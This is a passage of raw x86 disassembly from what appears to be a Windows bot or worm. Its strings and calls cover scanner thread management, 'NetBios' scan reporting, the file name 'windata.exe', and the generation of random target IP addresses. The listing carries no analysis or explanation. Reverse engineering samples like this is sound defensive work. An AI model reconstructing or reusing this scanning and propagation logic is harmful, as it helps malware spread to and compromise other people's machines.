; sub_40AFF6+1A�j
add esi, 234h
inc edi
cmp esi, offset dword_4D12E8
jl short loc_40B002
pop edi
pop esi
mov eax, ebx
pop ebx
retn
sub_40AFF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B028 proc near ; CODE XREF: sub_40274D+3E9B�p
; sub_40274D+3FE3�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], ebx
mov esi, offset dword_4444EC
loc_40B03C: ; CODE XREF: sub_40B028+43�j
mov eax, [esi-4]
cmp eax, [ebp+arg_0]
jnz short loc_40B05E
test edi, edi
jle short loc_40B050
cmp [esi], edi
jz short loc_40B050
cmp ebx, edi
jnz short loc_40B05E
loc_40B050: ; CODE XREF: sub_40B028+1E�j
; sub_40B028+22�j
push ebx
call sub_40AF6E
test eax, eax
pop ecx
jz short loc_40B05E
inc [ebp+var_4]
loc_40B05E: ; CODE XREF: sub_40B028+1A�j
; sub_40B028+26�j ...
add esi, 234h
inc ebx
cmp esi, offset dword_4D14EC
jl short loc_40B03C
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_40B028 endp
; =============== S U B R O U T I N E =======================================
sub_40B075 proc near ; CODE XREF: sub_40274D+896�p
; sub_40274D+1B5F�p ...
arg_0 = dword ptr 4
xor eax, eax
mov ecx, offset dword_4444E8
loc_40B07C: ; CODE XREF: sub_40B075+1C�j
mov edx, [ecx]
cmp edx, [esp+arg_0]
jnz short loc_40B085
inc eax
loc_40B085: ; CODE XREF: sub_40B075+D�j
add ecx, 234h
cmp ecx, offset dword_4D14E8
jl short loc_40B07C
retn
sub_40B075 endp
; =============== S U B R O U T I N E =======================================
sub_40B094 proc near ; CODE XREF: sub_40274D+2210�p
arg_0 = dword ptr 4
xor eax, eax
xor edx, edx
mov ecx, offset dword_4444E8
push esi
loc_40B09E: ; CODE XREF: sub_40B094+1F�j
mov esi, [ecx]
cmp esi, [esp+4+arg_0]
jz short loc_40B0B7
add ecx, 234h
inc edx
cmp ecx, offset dword_4D14E8
jl short loc_40B09E
pop esi
retn
; ---------------------------------------------------------------------------
loc_40B0B7: ; CODE XREF: sub_40B094+10�j
mov eax, edx
pop esi
retn
sub_40B094 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B0BB proc near ; CODE XREF: sub_40274D+10CE�p
; sub_40274D+10E9�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 200h
xor eax, eax
cmp [ebp+arg_1C], eax
jz short loc_40B0D4
push [ebp+arg_1C]
call sub_41E7AD
pop ecx
loc_40B0D4: ; CODE XREF: sub_40B0BB+E�j
push eax
push [ebp+arg_18]
call sub_40B028
test eax, eax
pop ecx
pop ecx
jle short loc_40B100
push eax
push [ebp+arg_14]
lea eax, [ebp+var_200]
push [ebp+arg_10]
push offset aSSStopped_DThr ; "%s %s stopped. (%d thread(s) stopped.)"
push eax
call sub_41E6A6
add esp, 14h
jmp short loc_40B11A
; ---------------------------------------------------------------------------
loc_40B100: ; CODE XREF: sub_40B0BB+26�j
push [ebp+arg_14]
lea eax, [ebp+var_200]
push [ebp+arg_10]
push offset aSNoSThreadFoun ; "%s No %s thread found."
push eax
call sub_41E6A6
add esp, 10h
loc_40B11A: ; CODE XREF: sub_40B0BB+43�j
cmp [ebp+arg_C], 0
jnz short loc_40B13A
push 0
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40123B
add esp, 14h
loc_40B13A: ; CODE XREF: sub_40B0BB+63�j
lea eax, [ebp+var_200]
push eax
call sub_417D70
pop ecx
leave
retn
sub_40B0BB endp
; =============== S U B R O U T I N E =======================================
sub_40B149 proc near ; CODE XREF: sub_4025EF+14C�p
; seg000:004133CA�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
imul eax, 234h
xor ecx, ecx
mov ds:dword_4444FC[eax], ecx
mov ds:dword_4444E8[eax], ecx
mov ds:dword_4444EC[eax], ecx
mov ds:dword_4444F0[eax], ecx
mov ds:dword_4444F4[eax], ecx
mov ds:dword_4444F8[eax], ecx
mov byte ptr ds:dword_4442E8[eax], cl
mov ds:byte_444500[eax], cl
retn
sub_40B149 endp
; ---------------------------------------------------------------------------
aUnlMbS db 'Ul$Œì˜',0 ; DATA XREF: sub_40274D+275F�o
align 10h
dd 7C458B00h, 266A5756h, 8DF08B59h, 0A5F3DC7Dh, 0C76475FFh
dd 9480h, 100h, 6875FF00h, 50E0458Dh, 0E8DC75FFh, 0FFFFFD34h
dd 0E86075FFh, 0FFFFFF85h, 6A14C483h, 6815FF00h, 0CC0042B0h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B1D0 proc near ; CODE XREF: sub_40B264+41�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, [ebp+arg_0]
mov ecx, [edx]
push edi
xor edi, edi
and [ebp+var_8], edi
xor eax, eax
inc eax
cmp byte ptr [ecx], 21h
mov [ebp+var_4], eax
jnz short loc_40B1F1
inc ecx
mov [ebp+var_8], eax
mov [edx], ecx
loc_40B1F1: ; CODE XREF: sub_40B1D0+19�j
push ebx
push esi
loc_40B1F3: ; CODE XREF: sub_40B1D0+77�j
mov ecx, [edx]
mov bl, [ecx]
cmp bl, 5Dh
jnz short loc_40B201
cmp [ebp+var_4], eax
jnz short loc_40B249
loc_40B201: ; CODE XREF: sub_40B1D0+2A�j
test edi, edi
jnz short loc_40B23E
cmp bl, 2Dh
jnz short loc_40B232
lea esi, [ecx+1]
mov cl, [ecx-1]
mov al, [esi]
cmp cl, al
jge short loc_40B232
cmp al, 5Dh
jz short loc_40B232
cmp [ebp+var_4], edi
jnz short loc_40B232
mov ebx, [ebp+arg_4]
mov ebx, [ebx]
mov bl, [ebx]
cmp bl, cl
jl short loc_40B23E
cmp bl, al
jg short loc_40B23E
mov [edx], esi
jmp short loc_40B23B
; ---------------------------------------------------------------------------
loc_40B232: ; CODE XREF: sub_40B1D0+38�j
; sub_40B1D0+44�j ...
mov eax, [ebp+arg_4]
mov eax, [eax]
cmp bl, [eax]
jnz short loc_40B23E
loc_40B23B: ; CODE XREF: sub_40B1D0+60�j
xor edi, edi
inc edi
loc_40B23E: ; CODE XREF: sub_40B1D0+33�j
; sub_40B1D0+58�j ...
inc dword ptr [edx]
and [ebp+var_4], 0
xor eax, eax
inc eax
jmp short loc_40B1F3
; ---------------------------------------------------------------------------
loc_40B249: ; CODE XREF: sub_40B1D0+2F�j
cmp [ebp+var_8], eax
pop esi
pop ebx
jnz short loc_40B256
mov ecx, eax
sub ecx, edi
mov edi, ecx
loc_40B256: ; CODE XREF: sub_40B1D0+7E�j
cmp edi, eax
jnz short loc_40B25F
mov eax, [ebp+arg_4]
inc dword ptr [eax]
loc_40B25F: ; CODE XREF: sub_40B1D0+88�j
mov eax, edi
pop edi
leave
retn
sub_40B1D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B264 proc near ; CODE XREF: sub_40274D+7A0F�p
; sub_40B2F8+65�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor eax, eax
push esi
mov esi, [ebp+arg_0]
inc eax
jmp short loc_40B2C6
; ---------------------------------------------------------------------------
loc_40B270: ; CODE XREF: sub_40B264+66�j
cmp eax, 1
jnz short loc_40B2D7
mov edx, [ebp+arg_4]
mov dl, [edx]
test dl, dl
jz short loc_40B2D7
cmp cl, 2Ah
jz short loc_40B2AF
cmp cl, 3Fh
jz short loc_40B294
cmp cl, 5Bh
jz short loc_40B299
xor eax, eax
cmp cl, dl
setz al
loc_40B294: ; CODE XREF: sub_40B264+22�j
inc [ebp+arg_4]
jmp short loc_40B2C2
; ---------------------------------------------------------------------------
loc_40B299: ; CODE XREF: sub_40B264+27�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
inc esi
push eax
mov [ebp+arg_0], esi
call sub_40B1D0
mov esi, [ebp+arg_0]
jmp short loc_40B2C0
; ---------------------------------------------------------------------------
loc_40B2AF: ; CODE XREF: sub_40B264+1D�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_40B2F8
mov esi, [ebp+arg_0]
dec esi
loc_40B2C0: ; CODE XREF: sub_40B264+49�j
pop ecx
pop ecx
loc_40B2C2: ; CODE XREF: sub_40B264+33�j
inc esi
mov [ebp+arg_0], esi
loc_40B2C6: ; CODE XREF: sub_40B264+A�j
mov cl, [esi]
test cl, cl
jnz short loc_40B270
jmp short loc_40B2D7
; ---------------------------------------------------------------------------
loc_40B2CE: ; CODE XREF: sub_40B264+76�j
cmp eax, 1
jnz short loc_40B2F3
inc esi
mov [ebp+arg_0], esi
loc_40B2D7: ; CODE XREF: sub_40B264+F�j
; sub_40B264+18�j ...
cmp byte ptr [esi], 2Ah
jz short loc_40B2CE
cmp eax, 1
jnz short loc_40B2F3
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_40B2F3
cmp byte ptr [esi], 0
jnz short loc_40B2F3
xor eax, eax
inc eax
jmp short loc_40B2F5
; ---------------------------------------------------------------------------
loc_40B2F3: ; CODE XREF: sub_40B264+6D�j
; sub_40B264+7B�j ...
xor eax, eax
loc_40B2F5: ; CODE XREF: sub_40B264+8D�j
pop esi
pop ebp
retn
sub_40B264 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B2F8 proc near ; CODE XREF: sub_40B264+53�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
inc dword ptr [esi]
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], 1
xor ebx, ebx
jmp short loc_40B327
; ---------------------------------------------------------------------------
loc_40B312: ; CODE XREF: sub_40B2F8+35�j
mov cl, [eax]
cmp cl, 3Fh
jz short loc_40B323
cmp cl, 2Ah
jnz short loc_40B32F
cmp cl, 3Fh
jnz short loc_40B325
loc_40B323: ; CODE XREF: sub_40B2F8+1F�j
inc dword ptr [edi]
loc_40B325: ; CODE XREF: sub_40B2F8+29�j
inc dword ptr [esi]
loc_40B327: ; CODE XREF: sub_40B2F8+18�j
mov ecx, [edi]
cmp [ecx], bl
mov eax, [esi]
jnz short loc_40B312
loc_40B32F: ; CODE XREF: sub_40B2F8+24�j
cmp byte ptr [eax], 2Ah
jnz short loc_40B33E
loc_40B334: ; CODE XREF: sub_40B2F8+44�j
inc eax
mov ecx, eax
mov [esi], eax
cmp byte ptr [ecx], 2Ah
jz short loc_40B334
loc_40B33E: ; CODE XREF: sub_40B2F8+3A�j
mov ecx, [edi]
mov dl, [ecx]
cmp dl, bl
jnz short loc_40B35B
cmp [eax], bl
jz short loc_40B34E
xor eax, eax
jmp short loc_40B3C0
; ---------------------------------------------------------------------------
loc_40B34E: ; CODE XREF: sub_40B2F8+50�j
cmp dl, bl
jnz short loc_40B35B
cmp [eax], bl
jnz short loc_40B35B
xor eax, eax
inc eax
jmp short loc_40B3C0
; ---------------------------------------------------------------------------
loc_40B35B: ; CODE XREF: sub_40B2F8+4C�j
; sub_40B2F8+58�j ...
push ecx
push eax
call sub_40B264
test eax, eax
pop ecx
pop ecx
jnz short loc_40B3AA
loc_40B368: ; CODE XREF: sub_40B2F8+B0�j
inc dword ptr [edi]
mov ecx, [esi]
mov eax, [edi]
mov cl, [ecx]
cmp cl, [eax]
jz short loc_40B38C
loc_40B374: ; CODE XREF: sub_40B2F8+92�j
mov ecx, [esi]
cmp byte ptr [ecx], 5Bh
jz short loc_40B38C
cmp [eax], bl
jz short loc_40B3A1
inc eax
mov [edi], eax
mov ecx, [esi]
mov cl, [ecx]
mov edx, eax
cmp cl, [edx]
jnz short loc_40B374
loc_40B38C: ; CODE XREF: sub_40B2F8+7A�j
; sub_40B2F8+81�j
cmp [eax], bl
jz short loc_40B3A1
push eax
push dword ptr [esi]
call sub_40B264
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_40B3A6
; ---------------------------------------------------------------------------
loc_40B3A1: ; CODE XREF: sub_40B2F8+85�j
; sub_40B2F8+96�j
mov [ebp+var_4], ebx
xor eax, eax
loc_40B3A6: ; CODE XREF: sub_40B2F8+A7�j
cmp eax, ebx
jnz short loc_40B368
loc_40B3AA: ; CODE XREF: sub_40B2F8+6E�j
mov eax, [edi]
cmp [eax], bl
jnz short loc_40B3BD
mov eax, [esi]
cmp [eax], bl
jnz short loc_40B3BD
mov [ebp+var_4], 1
loc_40B3BD: ; CODE XREF: sub_40B2F8+B6�j
; sub_40B2F8+BC�j
mov eax, [ebp+var_4]
loc_40B3C0: ; CODE XREF: sub_40B2F8+54�j
; sub_40B2F8+61�j
pop edi
pop esi
pop ebx
leave
retn
sub_40B2F8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B3C5 proc near ; CODE XREF: sub_40274D+28E2�p
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 400h
push ebx
push edi
lea eax, [ebp+var_200]
push offset unk_4328B8
push eax
xor ebx, ebx
call sub_41E6A6
cmp ds:dword_43D880, ebx
pop ecx
pop ecx
mov edi, 200h
jz short loc_40B438
push esi
mov esi, offset dword_43D888
loc_40B3F8: ; CODE XREF: sub_40B3C5+70�j
cmp dword ptr [esi], 0
jbe short loc_40B42E
mov eax, [esi]
push eax
add ebx, eax
lea eax, [esi-26h]
push eax
lea eax, [ebp+var_400]
push offset dword_4328AC
push eax
call sub_41E6A6
push edi
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+var_200]
push eax
call sub_41F2C0
add esp, 1Ch
loc_40B42E: ; CODE XREF: sub_40B3C5+36�j
add esi, 40h
cmp dword ptr [esi-8], 0
jnz short loc_40B3F8
pop esi
loc_40B438: ; CODE XREF: sub_40B3C5+2B�j
push ds:dword_4D1FD0
call sub_41D5F8
push eax
push ebx
lea eax, [ebp+var_400]
push offset aTotalDInS_ ; " Total: %d in %s."
push eax
call sub_41E6A6
push edi
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+var_200]
push eax
call sub_41F2C0
push 0
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40123B
lea eax, [ebp+var_200]
push eax
call sub_417D70
add esp, 38h
pop edi
pop ebx
leave
retn
sub_40B3C5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B494 proc near ; CODE XREF: sub_40274D+28CF�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
mov eax, ds:dword_4D400C
mov ecx, ds:dword_4D4008
push esi
push ds:dword_4D1FD0
lea esi, [ecx+eax]
call sub_41D5F8
push eax
push esi
push ds:dword_4D400C
lea eax, [ebp+var_200]
push ds:dword_4D4008
push offset unk_4328D8
push eax
call sub_41E6A6
push 0
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40123B
lea eax, [ebp+var_200]
push eax
call sub_417D70
add esp, 34h
pop esi
leave
retn
sub_40B494 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B4FF proc near ; CODE XREF: sub_40274D+28BC�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push ds:dword_4D1FD0
call sub_41D5F8
push eax
push ds:dword_4D5258
lea eax, [ebp+var_200]
push offset unk_432920
push eax
call sub_41E6A6
push 0
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40123B
lea eax, [ebp+var_200]
push eax
call sub_417D70
add esp, 2Ch
leave
retn
sub_40B4FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B553 proc near ; CODE XREF: sub_40274D+28A9�p
var_1000 = byte ptr -1000h
var_800 = byte ptr -800h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 1000h
call sub_41EA20
push edi
lea eax, [ebp+var_800]
push offset dword_43296C
push eax
call sub_41E6A6
cmp ds:dword_43D880, 0
pop ecx
pop ecx
mov edi, 800h
jz short loc_40B5BF
push esi
mov esi, offset aNetbios ; "NetBios"
loc_40B588: ; CODE XREF: sub_40B553+69�j
lea eax, [esi-0Ah]
push eax
push esi
lea eax, [ebp+var_1000]
push offset dword_43295C
push eax
call sub_41E6A6
push edi
lea eax, [ebp+var_1000]
push eax
lea eax, [ebp+var_800]
push eax
call sub_41F2C0
add esi, 40h
add esp, 1Ch
cmp dword ptr [esi+1Eh], 0
jnz short loc_40B588
pop esi
loc_40B5BF: ; CODE XREF: sub_40B553+2D�j
push ds:dword_4D1FD0
call sub_41D5F8
push eax
lea eax, [ebp+var_1000]
push offset aScanTimeS_ ; " Scan Time: %s."
push eax
call sub_41E6A6
push edi
lea eax, [ebp+var_1000]
push eax
lea eax, [ebp+var_800]
push eax
call sub_41F2C0
push 0
push [ebp+arg_8]
lea eax, [ebp+var_800]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40123B
lea eax, [ebp+var_800]
push eax
call sub_417D70
add esp, 34h
pop edi
leave
retn
sub_40B553 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B619 proc near ; CODE XREF: sub_40274D+2224�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push 0Bh
call sub_40B075
test eax, eax
pop ecx
jle short loc_40B655
mov eax, [ebp+arg_C]
push ds:dword_4D1FF0[eax*8]
call ds:dword_444188 ; inet_ntoa
push eax
lea eax, [ebp+var_200]
push offset unk_4329A8
push eax
call sub_41E6A6
add esp, 0Ch
jmp short loc_40B668
; ---------------------------------------------------------------------------
loc_40B655: ; CODE XREF: sub_40B619+13�j
lea eax, [ebp+var_200]
push offset unk_432988
push eax
call sub_41E6A6
pop ecx
pop ecx
loc_40B668: ; CODE XREF: sub_40B619+3A�j
push 0
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40123B
lea eax, [ebp+var_200]
push eax
call sub_417D70
add esp, 18h
leave
retn
sub_40B619 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 204h
mov eax, [ebp+138h]
cmp eax, 0FFFFFFFFh
jz locret_40BB49
push ebx
shl eax, 6
xor ebx, ebx
cmp ds:dword_43D88C[eax], ebx
jz loc_40BB48
push esi
push 5
call sub_40B075
test eax, eax
pop ecx
jnz loc_40B90A
mov eax, ds:dword_43C074
push edi
push 104h
mov esi, offset dword_4D470C
push esi
push ebx
mov ds:dword_4D491C, eax
mov ds:dword_4D4918, ebx
call ds:dword_42B00C ; GetModuleFileNameA
push 103h
mov edi, offset aWindata_exe ; "windata.exe"
push edi
push offset dword_4D4810
call sub_41E860
mov eax, [ebp+118h]
add esp, 0Ch
cmp [ebp+98h], bl
mov ds:dword_4D4708, eax
mov eax, [ebp+140h]
mov ds:dword_4D49A0, eax
push 7Fh
jnz short loc_40B740
lea eax, [ebp+18h]
push eax
push offset dword_4D4920
call sub_41E860
mov ds:dword_4D49A4, 1
jmp short loc_40B757
; ---------------------------------------------------------------------------
loc_40B740: ; CODE XREF: seg000:0040B724�j
lea eax, [ebp+98h]
push eax
push offset dword_4D4920
call sub_41E860
mov ds:dword_4D49A4, ebx
loc_40B757: ; CODE XREF: seg000:0040B73E�j
add esp, 0Ch
push esi
push ds:dword_4D491C
lea eax, [ebp-204h]
push offset unk_42F120
push eax
call sub_41E6A6
push ebx
lea eax, [ebp-204h]
push 5
push eax
call sub_40AE85
add esp, 1Ch
mov ds:dword_4D4914, eax
lea eax, [ebp-4]
push eax
push ebx
push offset dword_4D4708
push offset aUnlMb ; "Ul$Γ|\b"
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, ds:dword_4D4914
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz loc_40B85B
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
lea eax, [ebp-204h]
push offset dword_432AC8
push eax
call sub_41E6A6
add esp, 0Ch
loc_40B7D5: ; CODE XREF: seg000:0040B863�j
lea eax, [ebp-204h]
push eax
call sub_417D70
mov eax, ds:dword_4D1FE4
mov dword ptr [esp], 104h
mov esi, offset dword_4D4464
push esi
push ebx
mov ds:dword_4D4674, eax
mov ds:dword_4D4670, ebx
call ds:dword_42B00C ; GetModuleFileNameA
push 103h
push edi
push offset dword_4D4568
call sub_41E860
mov eax, [ebp+118h]
add esp, 0Ch
cmp [ebp+98h], bl
mov ds:dword_4D4460, eax
mov eax, [ebp+140h]
pop edi
mov ds:dword_4D46F8, eax
push 7Fh
jnz short loc_40B868
lea eax, [ebp+18h]
push eax
push offset dword_4D4678
call sub_41E860
mov ds:dword_4D46FC, 1
jmp short loc_40B87F
; ---------------------------------------------------------------------------
loc_40B853: ; CODE XREF: seg000:0040B861�j
push 32h
call ds:dword_42B014 ; Sleep
loc_40B85B: ; CODE XREF: seg000:0040B7B4�j
cmp ds:dword_4D49A8, ebx
jz short loc_40B853
jmp loc_40B7D5
; ---------------------------------------------------------------------------
loc_40B868: ; CODE XREF: seg000:0040B837�j
lea eax, [ebp+98h]
push eax
push offset dword_4D4678
call sub_41E860
mov ds:dword_4D46FC, ebx
loc_40B87F: ; CODE XREF: seg000:0040B851�j
add esp, 0Ch
push esi
push ds:dword_4D4674
lea eax, [ebp-204h]
push offset unk_432A94
push eax
call sub_41E6A6
push ebx
lea eax, [ebp-204h]
push 4
push eax
call sub_40AE85
add esp, 1Ch
mov ds:dword_4D466C, eax
lea eax, [ebp-4]
push eax
push ebx
push offset dword_4D4460
push offset aUnlMbP ; "Ul$Γp\n"
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, ds:dword_4D466C
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz loc_40B983
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
lea eax, [ebp-204h]
push offset unk_432A60
push eax
call sub_41E6A6
add esp, 0Ch
loc_40B8FD: ; CODE XREF: seg000:0040B98B�j
lea eax, [ebp-204h]
push eax
call sub_417D70
pop ecx
loc_40B90A: ; CODE XREF: seg000:0040B6C5�j
mov eax, [ebp+138h]
mov ecx, eax
shl ecx, 6
cmp ds:dword_43D894[ecx], ebx
jz loc_40BA37
push 7
call sub_40B075
test eax, eax
pop ecx
jnz loc_40BA31
cmp [ebp+98h], bl
mov eax, ds:dword_4D525C
mov ds:dword_4D43CC, eax
mov eax, [ebp+118h]
mov ds:dword_4D43C0, eax
mov eax, [ebp+140h]
mov ds:dword_4D43C8, ebx
mov ds:dword_4D4450, eax
push 7Fh
jnz short loc_40B990
lea eax, [ebp+18h]
push eax
push offset dword_4D43D0
call sub_41E860
mov ds:dword_4D4454, 1
jmp short loc_40B9A7
; ---------------------------------------------------------------------------
loc_40B97B: ; CODE XREF: seg000:0040B989�j
push 32h
call ds:dword_42B014 ; Sleep
loc_40B983: ; CODE XREF: seg000:0040B8DC�j
cmp ds:dword_4D4700, ebx
jz short loc_40B97B
jmp loc_40B8FD
; ---------------------------------------------------------------------------
loc_40B990: ; CODE XREF: seg000:0040B95F�j
lea eax, [ebp+98h]
push eax
push offset dword_4D43D0
call sub_41E860
mov ds:dword_4D4454, ebx
loc_40B9A7: ; CODE XREF: seg000:0040B979�j
add esp, 0Ch
push ds:dword_4D43CC
lea eax, [ebp-204h]
push offset unk_432A30
push eax
call sub_41E6A6
push ebx
lea eax, [ebp-204h]
push 7
push eax
call sub_40AE85
add esp, 18h
mov ds:dword_4D43C4, eax
lea eax, [ebp-4]
push eax
push ebx
push offset dword_4D43C0
push offset word_411722
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, ds:dword_4D43C4
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz loc_40BB53
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
lea eax, [ebp-204h]
push offset unk_4329F8
push eax
call sub_41E6A6
add esp, 0Ch
loc_40BA24: ; CODE XREF: seg000:0040BB5B�j
lea eax, [ebp-204h]
push eax
call sub_417D70
pop ecx
loc_40BA31: ; CODE XREF: seg000:0040B92B�j
mov eax, [ebp+138h]
loc_40BA37: ; CODE XREF: seg000:0040B91B�j
shl eax, 6
cmp ds:dword_43D890[eax], ebx
jz loc_40BB47
push 3
call sub_40B075
test eax, eax
pop ecx
jnz loc_40BB47
push 104h
mov esi, offset dword_4D429C
push esi
push ebx
call ds:dword_42B00C ; GetModuleFileNameA
push 5Ch
push esi
call sub_41EE50
cmp eax, ebx
pop ecx
pop ecx
jz short loc_40BA78
mov [eax], bl
loc_40BA78: ; CODE XREF: seg000:0040BA74�j
mov eax, ds:dword_43C078
mov ds:dword_4D43A0, eax
lea eax, [ebp+18h]
push eax
push offset dword_4D4014
mov ds:dword_4D43B4, ebx
call sub_41E6A6
mov eax, [ebp+118h]
pop ecx
pop ecx
mov ecx, [ebp+140h]
push esi
push ds:dword_4D43A0
mov ds:dword_4D43AC, ecx
mov ecx, [ebp+144h]
push eax
mov ds:dword_4D4010, eax
mov ds:dword_4D43B0, ecx
call sub_4023C9
pop ecx
push eax
lea eax, [ebp-204h]
push offset unk_42F0A8
push eax
call sub_41E6A6
push ebx
lea eax, [ebp-204h]
push 3
push eax
call sub_40AE85
add esp, 20h
mov ds:dword_4D43A8, eax
lea eax, [ebp-4]
push eax
push ebx
push offset dword_4D4010
push offset byte_412DD9
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, ds:dword_4D43A8
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_40BB68
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
lea eax, [ebp-204h]
push offset unk_4329C4
push eax
call sub_41E6A6
add esp, 0Ch
loc_40BB3A: ; CODE XREF: seg000:0040BB70�j
lea eax, [ebp-204h]
push eax
call sub_417D70
pop ecx
loc_40BB47: ; CODE XREF: seg000:0040BA40�j
; seg000:0040BA50�j
pop esi
loc_40BB48: ; CODE XREF: seg000:0040B6B4�j
pop ebx
locret_40BB49: ; CODE XREF: seg000:0040B6A2�j
leave
retn
; ---------------------------------------------------------------------------
loc_40BB4B: ; CODE XREF: seg000:0040BB59�j
push 32h
call ds:dword_42B014 ; Sleep
loc_40BB53: ; CODE XREF: seg000:0040BA03�j
cmp ds:dword_4D4458, ebx
jz short loc_40BB4B
jmp loc_40BA24
; ---------------------------------------------------------------------------
loc_40BB60: ; CODE XREF: seg000:0040BB6E�j
push 32h
call ds:dword_42B014 ; Sleep
loc_40BB68: ; CODE XREF: seg000:0040BB1D�j
cmp ds:dword_4D43BC, ebx
jz short loc_40BB60
jmp short loc_40BB3A
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push esi
mov esi, [ebp+8]
push 4
lea esi, ds:4D1FF0h[esi*8]
lea eax, [ebp+8]
push esi
push eax
call sub_41F400
add esp, 0Ch
push dword ptr [ebp+8]
call ds:dword_4441DC ; htonl
inc eax
push eax
mov [ebp+8], eax
call ds:dword_444234 ; htonl
mov [ebp+8], eax
push 4
lea eax, [ebp+8]
push eax
push esi
call sub_41F400
mov eax, [esi]
add esp, 0Ch
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
push esi
push dword ptr [ebp+8]
or esi, 0FFFFFFFFh
mov [ebp-0Ch], esi
mov [ebp-8], esi
mov [ebp-4], esi
mov [ebp-10h], esi
call sub_41E1C0
cmp eax, 0Fh
pop ecx
jbe short loc_40BBE2
xor eax, eax
jmp short loc_40BC53
; ---------------------------------------------------------------------------
loc_40BBE2: ; CODE XREF: seg000:0040BBDC�j
lea eax, [ebp-10h]
push eax
lea eax, [ebp-4]
push eax
lea eax, [ebp-8]
push eax
lea eax, [ebp-0Ch]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push dword ptr [ebp+8]
call sub_41F73D
add esp, 18h
cmp [ebp-0Ch], esi
jnz short loc_40BC0F
call sub_41ECDE
mov [ebp-0Ch], eax
loc_40BC0F: ; CODE XREF: seg000:0040BC05�j
cmp [ebp-8], esi
jnz short loc_40BC1C
call sub_41ECDE
mov [ebp-8], eax
loc_40BC1C: ; CODE XREF: seg000:0040BC12�j
cmp [ebp-4], esi
jnz short loc_40BC29
call sub_41ECDE
mov [ebp-4], eax
loc_40BC29: ; CODE XREF: seg000:0040BC1F�j
mov eax, [ebp-10h]
cmp eax, esi
jnz short loc_40BC35
call sub_41ECDE
